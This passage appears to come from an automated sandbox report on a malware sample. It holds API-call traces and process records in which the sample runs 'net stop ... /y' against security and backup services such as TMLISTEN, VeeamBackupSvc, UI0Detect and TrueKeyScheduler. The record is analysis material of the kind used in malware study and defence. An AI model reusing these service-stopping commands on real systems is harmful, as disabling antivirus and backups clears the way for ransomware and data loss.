| out: lpFilename="C:\\Windows\\system32\\net1.exe" (normalized: "c:\\windows\\system32\\net1.exe")) returned 0x1c [0116.699] _wcsnicmp (_String1="/Y", _String2="/y", _MaxCount=0x2) returned 0 [0116.700] NetApiBufferAllocate (in: ByteCount=0x18, Buffer=0x10f8e8 | out: Buffer=0x10f8e8*=0x184d40) returned 0x0 [0116.700] NetApiBufferAllocate (in: ByteCount=0x18, Buffer=0x10f8e8 | out: Buffer=0x10f8e8*=0x18c0e0) returned 0x0 [0116.700] _fileno (_File=0x7fefdba2a80) returned 0 [0116.700] _setmode (_FileHandle=0, _Mode=16384) returned 16384 [0116.700] _wcsicmp (_String1="accounts", _String2="stop") returned -18 [0116.700] _wcsicmp (_String1="computer", _String2="stop") returned -16 [0116.700] _wcsicmp (_String1="config", _String2="stop") returned -16 [0116.700] _wcsicmp (_String1="continue", _String2="stop") returned -16 [0116.700] _wcsicmp (_String1="cont", _String2="stop") returned -16 [0116.700] _wcsicmp (_String1="file", _String2="stop") returned -13 [0116.700] _wcsicmp (_String1="files", _String2="stop") returned -13 [0116.700] _wcsicmp (_String1="group", _String2="stop") returned -12 [0116.700] _wcsicmp (_String1="groups", _String2="stop") returned -12 [0116.701] _wcsicmp (_String1="help", _String2="stop") returned -11 [0116.701] _wcsicmp (_String1="helpmsg", _String2="stop") returned -11 [0116.701] _wcsicmp (_String1="localgroup", _String2="stop") returned -7 [0116.701] _wcsicmp (_String1="pause", _String2="stop") returned -3 [0116.701] _wcsicmp (_String1="session", _String2="stop") returned -15 [0116.701] _wcsicmp (_String1="sessions", _String2="stop") returned -15 [0116.701] _wcsicmp (_String1="sess", _String2="stop") returned -15 [0116.701] _wcsicmp (_String1="share", _String2="stop") returned -12 [0116.701] _wcsicmp (_String1="start", _String2="stop") returned -14 [0116.701] _wcsicmp (_String1="stats", _String2="stop") returned -14 [0116.701] _wcsicmp (_String1="statistics", _String2="stop") returned -14 [0116.701] _wcsicmp (_String1="stop", _String2="stop") returned 0 [0116.701] _wcsicmp (_String1="accounts", _String2="tmlisten") returned -19 [0116.701] _wcsicmp (_String1="computer", _String2="tmlisten") returned -17 [0116.701] _wcsicmp (_String1="config", _String2="tmlisten") returned -17 [0116.701] _wcsicmp (_String1="continue", _String2="tmlisten") returned -17 [0116.701] _wcsicmp (_String1="cont", _String2="tmlisten") returned -17 [0116.701] _wcsicmp (_String1="file", _String2="tmlisten") returned -14 [0116.701] _wcsicmp (_String1="files", _String2="tmlisten") returned -14 [0116.701] _wcsicmp (_String1="group", _String2="tmlisten") returned -13 [0116.701] _wcsicmp (_String1="groups", _String2="tmlisten") returned -13 [0116.701] _wcsicmp (_String1="help", _String2="tmlisten") returned -12 [0116.701] _wcsicmp (_String1="helpmsg", _String2="tmlisten") returned -12 [0116.702] _wcsicmp (_String1="localgroup", _String2="tmlisten") returned -8 [0116.702] _wcsicmp (_String1="pause", _String2="tmlisten") returned -4 [0116.702] _wcsicmp (_String1="session", _String2="tmlisten") returned -1 [0116.702] _wcsicmp (_String1="sessions", _String2="tmlisten") returned -1 [0116.702] _wcsicmp (_String1="sess", _String2="tmlisten") returned -1 [0116.702] _wcsicmp (_String1="share", _String2="tmlisten") returned -1 [0116.702] _wcsicmp (_String1="start", _String2="tmlisten") returned -1 [0116.702] _wcsicmp (_String1="stats", _String2="tmlisten") returned -1 [0116.702] _wcsicmp (_String1="statistics", _String2="tmlisten") returned -1 [0116.702] _wcsicmp (_String1="stop", _String2="tmlisten") returned -1 [0116.702] _wcsicmp (_String1="time", _String2="tmlisten") returned -4 [0116.702] _wcsicmp (_String1="user", _String2="tmlisten") returned 1 [0116.702] _wcsicmp (_String1="users", _String2="tmlisten") returned 1 [0116.702] _wcsicmp (_String1="msg", _String2="tmlisten") returned -7 [0116.702] _wcsicmp (_String1="messenger", _String2="tmlisten") returned -7 [0116.702] _wcsicmp (_String1="receiver", _String2="tmlisten") returned -2 [0116.702] _wcsicmp (_String1="rcv", _String2="tmlisten") returned -2 [0116.702] _wcsicmp (_String1="netpopup", _String2="tmlisten") returned -6 [0116.702] _wcsicmp (_String1="redirector", _String2="tmlisten") returned -2 [0116.702] _wcsicmp (_String1="redir", _String2="tmlisten") returned -2 [0116.702] _wcsicmp (_String1="rdr", _String2="tmlisten") returned -2 [0116.702] _wcsicmp (_String1="workstation", _String2="tmlisten") returned 3 [0116.702] _wcsicmp (_String1="work", _String2="tmlisten") returned 3 [0116.703] _wcsicmp (_String1="wksta", _String2="tmlisten") returned 3 [0116.703] _wcsicmp (_String1="prdr", _String2="tmlisten") returned -4 [0116.703] _wcsicmp (_String1="devrdr", _String2="tmlisten") returned -16 [0116.703] _wcsicmp (_String1="lanmanworkstation", _String2="tmlisten") returned -8 [0116.703] _wcsicmp (_String1="server", _String2="tmlisten") returned -1 [0116.703] _wcsicmp (_String1="svr", _String2="tmlisten") returned -1 [0116.703] _wcsicmp (_String1="srv", _String2="tmlisten") returned -1 [0116.703] _wcsicmp (_String1="lanmanserver", _String2="tmlisten") returned -8 [0116.703] _wcsicmp (_String1="alerter", _String2="tmlisten") returned -19 [0116.703] _wcsicmp (_String1="netlogon", _String2="tmlisten") returned -6 [0116.703] _wcsupr (in: _String="tmlisten" | out: _String="TMLISTEN") returned="TMLISTEN" [0116.703] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x80000000) returned 0x18cdf0 [0116.708] GetServiceKeyNameW (in: hSCManager=0x18cdf0, lpDisplayName="TMLISTEN", lpServiceName=0xffe15750, lpcchBuffer=0x10f808 | out: lpServiceName="", lpcchBuffer=0x10f808) returned 0 [0116.709] _wcsicmp (_String1="msg", _String2="TMLISTEN") returned -7 [0116.709] _wcsicmp (_String1="messenger", _String2="TMLISTEN") returned -7 [0116.709] _wcsicmp (_String1="receiver", _String2="TMLISTEN") returned -2 [0116.710] _wcsicmp (_String1="rcv", _String2="TMLISTEN") returned -2 [0116.710] _wcsicmp (_String1="redirector", _String2="TMLISTEN") returned -2 [0116.710] _wcsicmp (_String1="redir", _String2="TMLISTEN") returned -2 [0116.710] _wcsicmp (_String1="rdr", _String2="TMLISTEN") returned -2 [0116.710] _wcsicmp (_String1="workstation", _String2="TMLISTEN") returned 3 [0116.710] _wcsicmp (_String1="work", _String2="TMLISTEN") returned 3 [0116.710] _wcsicmp (_String1="wksta", _String2="TMLISTEN") returned 3 [0116.710] _wcsicmp (_String1="prdr", _String2="TMLISTEN") returned -4 [0116.710] _wcsicmp (_String1="devrdr", _String2="TMLISTEN") returned -16 [0116.710] _wcsicmp (_String1="lanmanworkstation", _String2="TMLISTEN") returned -8 [0116.710] _wcsicmp (_String1="server", _String2="TMLISTEN") returned -1 [0116.710] _wcsicmp (_String1="svr", _String2="TMLISTEN") returned -1 [0116.710] _wcsicmp (_String1="srv", _String2="TMLISTEN") returned -1 [0116.710] _wcsicmp (_String1="lanmanserver", _String2="TMLISTEN") returned -8 [0116.710] _wcsicmp (_String1="alerter", _String2="TMLISTEN") returned -19 [0116.710] _wcsicmp (_String1="netlogon", _String2="TMLISTEN") returned -6 [0116.710] NetServiceControl (in: servername=0x0, service="TMLISTEN", opcode=0x0, arg=0x0, bufptr=0x10f810 | out: bufptr=0x10f810) returned 0x889 [0116.712] wcscpy_s (in: _Destination=0xffe180d0, _SizeInWords=0x104, _Source="NETMSG" | out: _Destination="NETMSG") returned 0x0 [0116.712] LoadLibraryW (lpLibFileName="NETMSG") returned 0x75290000 [0116.713] FormatMessageW (in: dwFlags=0x2a00, lpSource=0x75290000, dwMessageId=0x889, dwLanguageId=0x0, lpBuffer=0xffe15b50, nSize=0x800, Arguments=0xffe17f90 | out: lpBuffer="The service name is invalid.\r\n") returned 0x1e [0116.715] GetFileType (hFile=0xb) returned 0x2 [0116.715] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x10f6d8 | out: lpMode=0x10f6d8) returned 1 [0116.716] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xffe15b50*, nNumberOfCharsToWrite=0x1e, lpNumberOfCharsWritten=0x10f6d0, lpReserved=0x0 | out: lpBuffer=0xffe15b50*, lpNumberOfCharsWritten=0x10f6d0*=0x1e) returned 1 [0116.716] GetFileType (hFile=0xb) returned 0x2 [0116.716] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x10f6d8 | out: lpMode=0x10f6d8) returned 1 [0116.717] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xffdf1efc*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x10f6d0, lpReserved=0x0 | out: lpBuffer=0xffdf1efc*, lpNumberOfCharsWritten=0x10f6d0*=0x2) returned 1 [0116.717] _ultow (in: _Dest=0x889, _Radix=1111872 | out: _Dest=0x889) returned="2185" [0116.717] FormatMessageW (in: dwFlags=0x2800, lpSource=0x75290000, dwMessageId=0xdba, dwLanguageId=0x0, lpBuffer=0xffe15b50, nSize=0x800, Arguments=0xffe17f90 | out: lpBuffer="More help is available by typing NET HELPMSG 2185.\r\n") returned 0x34 [0116.718] GetFileType (hFile=0xb) returned 0x2 [0116.718] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x10f6d8 | out: lpMode=0x10f6d8) returned 1 [0116.718] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xffe15b50*, nNumberOfCharsToWrite=0x34, lpNumberOfCharsWritten=0x10f6d0, lpReserved=0x0 | out: lpBuffer=0xffe15b50*, lpNumberOfCharsWritten=0x10f6d0*=0x34) returned 1 [0116.719] GetFileType (hFile=0xb) returned 0x2 [0116.719] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x10f6d8 | out: lpMode=0x10f6d8) returned 1 [0116.719] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xffdf1efc*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x10f6d0, lpReserved=0x0 | out: lpBuffer=0xffdf1efc*, lpNumberOfCharsWritten=0x10f6d0*=0x2) returned 1 [0116.720] NetApiBufferFree (Buffer=0x184d40) returned 0x0 [0116.720] NetApiBufferFree (Buffer=0x18c0e0) returned 0x0 [0116.720] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop tmlisten /y" [0116.720] exit (_Code=2) Process: id = "329" image_name = "net.exe" filename = "c:\\windows\\system32\\net.exe" page_root = "0x50f2f000" os_pid = "0x9dc" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0x954" cmd_line = "\"C:\\Windows\\System32\\net.exe\" stop UI0Detect /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea88" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 11658 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 11659 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 11660 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 11661 start_va = 0x110000 end_va = 0x18ffff entry_point = 0x0 region_type = private name = "private_0x0000000000110000" filename = "" Region: id = 11662 start_va = 0x77670000 end_va = 0x77818fff entry_point = 0x77670000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 11663 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 11664 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 11665 start_va = 0xff5a0000 end_va = 0xff5bbfff entry_point = 0xff5a0000 region_type = mapped_file name = "net.exe" filename = "\\Windows\\System32\\net.exe" (normalized: "c:\\windows\\system32\\net.exe") Region: id = 11666 start_va = 0x7feff990000 end_va = 0x7feff990fff entry_point = 0x7feff990000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 11667 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 11668 start_va = 0x7fffffdd000 end_va = 0x7fffffdefff entry_point = 0x0 region_type = private name = "private_0x000007fffffdd000" filename = "" Region: id = 11669 start_va = 0x7fffffdf000 end_va = 0x7fffffdffff entry_point = 0x0 region_type = private name = "private_0x000007fffffdf000" filename = "" Region: id = 11670 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 11671 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 11672 start_va = 0x1f0000 end_va = 0x2effff entry_point = 0x0 region_type = private name = "private_0x00000000001f0000" filename = "" Region: id = 11673 start_va = 0x77550000 end_va = 0x7766efff entry_point = 0x77550000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 11674 start_va = 0x7efe0000 end_va = 0x7f0dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 11675 start_va = 0x7f0e0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 11676 start_va = 0x7fefd920000 end_va = 0x7fefd98afff entry_point = 0x7fefd920000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Thread: id = 850 os_tid = 0xc90 Process: id = "330" image_name = "net.exe" filename = "c:\\windows\\system32\\net.exe" page_root = "0x50a4e000" os_pid = "0xc6c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0x954" cmd_line = "\"C:\\Windows\\System32\\net.exe\" stop VeeamBackupSvc /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea88" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 11677 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 11678 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 11679 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 11680 start_va = 0x210000 end_va = 0x28ffff entry_point = 0x0 region_type = private name = "private_0x0000000000210000" filename = "" Region: id = 11681 start_va = 0x77670000 end_va = 0x77818fff entry_point = 0x77670000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 11682 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 11683 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 11684 start_va = 0xff5a0000 end_va = 0xff5bbfff entry_point = 0xff5a0000 region_type = mapped_file name = "net.exe" filename = "\\Windows\\System32\\net.exe" (normalized: "c:\\windows\\system32\\net.exe") Region: id = 11685 start_va = 0x7feff990000 end_va = 0x7feff990fff entry_point = 0x7feff990000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 11686 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 11687 start_va = 0x7fffffd5000 end_va = 0x7fffffd5fff entry_point = 0x0 region_type = private name = "private_0x000007fffffd5000" filename = "" Region: id = 11688 start_va = 0x7fffffde000 end_va = 0x7fffffdffff entry_point = 0x0 region_type = private name = "private_0x000007fffffde000" filename = "" Region: id = 11689 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 11690 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 11691 start_va = 0xf0000 end_va = 0x1effff entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 11692 start_va = 0x77550000 end_va = 0x7766efff entry_point = 0x77550000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 11693 start_va = 0x7efe0000 end_va = 0x7f0dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 11694 start_va = 0x7f0e0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 11695 start_va = 0x7fefd920000 end_va = 0x7fefd98afff entry_point = 0x7fefd920000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Thread: id = 852 os_tid = 0x61c Process: id = "331" image_name = "net1.exe" filename = "c:\\windows\\system32\\net1.exe" page_root = "0x50ffd000" os_pid = "0xc94" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "324" os_parent_pid = "0x7e4" cmd_line = "C:\\Windows\\system32\\net1 stop TrueKeyScheduler /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea88" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 11696 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 11697 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 11698 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 11699 start_va = 0x210000 end_va = 0x28ffff entry_point = 0x0 region_type = private name = "private_0x0000000000210000" filename = "" Region: id = 11700 start_va = 0x77670000 end_va = 0x77818fff entry_point = 0x77670000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 11701 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 11702 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 11703 start_va = 0xffdf0000 end_va = 0xffe22fff entry_point = 0xffdf0000 region_type = mapped_file name = "net1.exe" filename = "\\Windows\\System32\\net1.exe" (normalized: "c:\\windows\\system32\\net1.exe") Region: id = 11704 start_va = 0x7feff990000 end_va = 0x7feff990fff entry_point = 0x7feff990000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 11705 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 11706 start_va = 0x7fffffd8000 end_va = 0x7fffffd8fff entry_point = 0x0 region_type = private name = "private_0x000007fffffd8000" filename = "" Region: id = 11707 start_va = 0x7fffffde000 end_va = 0x7fffffdffff entry_point = 0x0 region_type = private name = "private_0x000007fffffde000" filename = "" Region: id = 11708 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 11709 start_va = 0x80000 end_va = 0x17ffff entry_point = 0x0 region_type = private name = "private_0x0000000000080000" filename = "" Region: id = 11710 start_va = 0x180000 end_va = 0x1e6fff entry_point = 0x180000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 11711 start_va = 0x77550000 end_va = 0x7766efff entry_point = 0x77550000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 11712 start_va = 0x7efe0000 end_va = 0x7f0dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 11713 start_va = 0x7f0e0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 11714 start_va = 0x7fefd920000 end_va = 0x7fefd98afff entry_point = 0x7fefd920000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 11715 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 11716 start_va = 0x290000 end_va = 0x38ffff entry_point = 0x0 region_type = private name = "private_0x0000000000290000" filename = "" Region: id = 11717 start_va = 0x400000 end_va = 0x40ffff entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 11718 start_va = 0x7fef43a0000 end_va = 0x7fef43b1fff entry_point = 0x7fef43a0000 region_type = mapped_file name = "browcli.dll" filename = "\\Windows\\System32\\browcli.dll" (normalized: "c:\\windows\\system32\\browcli.dll") Region: id = 11719 start_va = 0x7fef7330000 end_va = 0x7fef7356fff entry_point = 0x7fef7330000 region_type = mapped_file name = "ntdsapi.dll" filename = "\\Windows\\System32\\ntdsapi.dll" (normalized: "c:\\windows\\system32\\ntdsapi.dll") Region: id = 11720 start_va = 0x7fefb050000 end_va = 0x7fefb05bfff entry_point = 0x7fefb050000 region_type = mapped_file name = "dsrole.dll" filename = "\\Windows\\System32\\dsrole.dll" (normalized: "c:\\windows\\system32\\dsrole.dll") Region: id = 11721 start_va = 0x7fefb7c0000 end_va = 0x7fefb7d3fff entry_point = 0x7fefb7c0000 region_type = mapped_file name = "samcli.dll" filename = "\\Windows\\System32\\samcli.dll" (normalized: "c:\\windows\\system32\\samcli.dll") Region: id = 11722 start_va = 0x7fefb7e0000 end_va = 0x7fefb7f4fff entry_point = 0x7fefb7e0000 region_type = mapped_file name = "wkscli.dll" filename = "\\Windows\\System32\\wkscli.dll" (normalized: "c:\\windows\\system32\\wkscli.dll") Region: id = 11723 start_va = 0x7fefb800000 end_va = 0x7fefb80bfff entry_point = 0x7fefb800000 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\System32\\netutils.dll" (normalized: "c:\\windows\\system32\\netutils.dll") Region: id = 11724 start_va = 0x7fefb810000 end_va = 0x7fefb825fff entry_point = 0x7fefb810000 region_type = mapped_file name = "netapi32.dll" filename = "\\Windows\\System32\\netapi32.dll" (normalized: "c:\\windows\\system32\\netapi32.dll") Region: id = 11725 start_va = 0x7fefc0a0000 end_va = 0x7fefc0bcfff entry_point = 0x7fefc0a0000 region_type = mapped_file name = "samlib.dll" filename = "\\Windows\\System32\\samlib.dll" (normalized: "c:\\windows\\system32\\samlib.dll") Region: id = 11726 start_va = 0x7fefcca0000 end_va = 0x7fefcccffff entry_point = 0x7fefcca0000 region_type = mapped_file name = "logoncli.dll" filename = "\\Windows\\System32\\logoncli.dll" (normalized: "c:\\windows\\system32\\logoncli.dll") Region: id = 11727 start_va = 0x7fefd3b0000 end_va = 0x7fefd3d2fff entry_point = 0x7fefd3b0000 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\System32\\srvcli.dll" (normalized: "c:\\windows\\system32\\srvcli.dll") Region: id = 11728 start_va = 0x7fefdb10000 end_va = 0x7fefdbaefff entry_point = 0x7fefdb10000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 11729 start_va = 0x7fefe330000 end_va = 0x7fefe34efff entry_point = 0x7fefe330000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 11730 start_va = 0x7feff2d0000 end_va = 0x7feff2d7fff entry_point = 0x7feff2d0000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 11731 start_va = 0x7feff490000 end_va = 0x7feff4dcfff entry_point = 0x7feff490000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 11732 start_va = 0x7feff740000 end_va = 0x7feff81afff entry_point = 0x7feff740000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 11733 start_va = 0x7feff820000 end_va = 0x7feff94cfff entry_point = 0x7feff820000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 11772 start_va = 0x75290000 end_va = 0x75291fff entry_point = 0x75290000 region_type = mapped_file name = "netmsg.dll" filename = "\\Windows\\System32\\netmsg.dll" (normalized: "c:\\windows\\system32\\netmsg.dll") Thread: id = 854 os_tid = 0x1260 [0117.081] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x28f8d0 | out: lpSystemTimeAsFileTime=0x28f8d0*(dwLowDateTime=0xfaee0f30, dwHighDateTime=0x1d48689)) [0117.081] GetCurrentProcessId () returned 0xc94 [0117.081] GetCurrentThreadId () returned 0x1260 [0117.081] GetTickCount () returned 0x26f17 [0117.081] QueryPerformanceCounter (in: lpPerformanceCount=0x28f8d8 | out: lpPerformanceCount=0x28f8d8*=1816399900000) returned 1 [0117.082] GetModuleHandleW (lpModuleName=0x0) returned 0xffdf0000 [0117.082] __set_app_type (_Type=0x1) [0117.082] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xffe09c9c) returned 0x0 [0117.083] __getmainargs (in: _Argc=0xffe14780, _Argv=0xffe14790, _Env=0xffe14788, _DoWildCard=0, _StartInfo=0xffe1479c | out: _Argc=0xffe14780, _Argv=0xffe14790, _Env=0xffe14788) returned 0 [0117.083] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0117.083] GetConsoleOutputCP () returned 0x1b5 [0117.202] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xffe1cec0 | out: lpCPInfo=0xffe1cec0) returned 1 [0117.202] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409 [0117.205] sprintf_s (in: _DstBuf=0x28f878, _DstSize=0xc, _Format=".%u" | out: _DstBuf=".437") returned 4 [0117.205] setlocale (category=0, locale=".437") returned="English_United States.437" [0117.207] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0117.207] GetStdHandle (nStdHandle=0xfffffff4) returned 0xb [0117.207] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop TrueKeyScheduler /y" [0117.207] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x28f610, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\net1.exe" (normalized: "c:\\windows\\system32\\net1.exe")) returned 0x1c [0117.207] _wcsnicmp (_String1="/Y", _String2="/y", _MaxCount=0x2) returned 0 [0117.207] NetApiBufferAllocate (in: ByteCount=0x18, Buffer=0x28f868 | out: Buffer=0x28f868*=0x94d50) returned 0x0 [0117.207] NetApiBufferAllocate (in: ByteCount=0x18, Buffer=0x28f868 | out: Buffer=0x28f868*=0x9c100) returned 0x0 [0117.207] 